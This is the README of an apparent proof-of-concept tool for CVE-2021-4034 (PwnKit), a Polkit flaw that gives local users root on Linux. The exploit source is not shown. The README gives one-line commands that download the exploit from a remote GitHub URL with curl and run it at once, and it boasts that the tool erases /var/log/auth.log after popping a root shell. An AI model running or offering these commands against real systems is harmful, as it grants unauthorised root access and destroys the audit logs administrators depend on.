██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Intro
This is a simple PoC for the newly found Polkit error names PwnKit.
I made it both as bash and python3 script - just for the fun of it.
The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.
How to run
This scripts are a one shot execution so simply do
python3 pkwner.py
or
bash pkwner.sh
You can also run it directly from a webserver (e.g. this github repo) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
or
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In both cases it should look something like this: 
and 
The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).
Credits
- Qualys for finding the issue and making the info public
- Andris Raugulis for making one of the first PoCs to get inspired from
- MiscGang because misgang@Kalmarunionen are baddass
1 Jan 27, 2022
3 Mar 25, 2022
56 Mar 25, 2022
52 Dec 16, 2022
589 Dec 30, 2022
41 Nov 09, 2022
11 Aug 07, 2022
3 Oct 20, 2021
263 Jan 01, 2023
1.9k Dec 30, 2022
9 Oct 30, 2022
12 Nov 09, 2022
1 Dec 03, 2021
45 Dec 20, 2022
89 Jan 01, 2023
1.3k Jan 03, 2023
6.7k Jan 05, 2023
77 Jan 03, 2023
3 Feb 03, 2022
10 Dec 21, 2021